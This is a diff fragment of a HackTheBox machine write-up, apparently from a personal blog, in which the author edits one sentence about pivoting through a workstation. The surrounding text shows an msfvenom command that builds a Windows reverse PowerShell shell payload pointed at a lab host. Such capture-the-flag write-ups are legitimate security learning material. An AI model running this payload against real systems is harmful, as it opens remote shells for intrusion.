bytebl33d/bytebl33d.github.io/writeups/hackthebox/machines/university.md

 root@LAB-2:#
 ```

-Alright, so plot twist time — instead of begging the main server to run our payload, we switch to “what if `WS-3` does the heavy lifting?” energy.
+Alright, so plot twist time, instead of begging the main server to run our payload, we switch to “what if `WS-3` does the heavy lifting?” energy.
 The idea: if a file gets opened from `WS-3`, we can make it point straight to `LAB-2` and skip all the drama.
 So I tweak my reverse shell to target `LAB-2`'s IP (192.168.99.12) instead:

 ```console
 $ msfvenom -p cmd/windows/reverse_powershell lhost=192.168.99.12 lport=1337 > rev.bat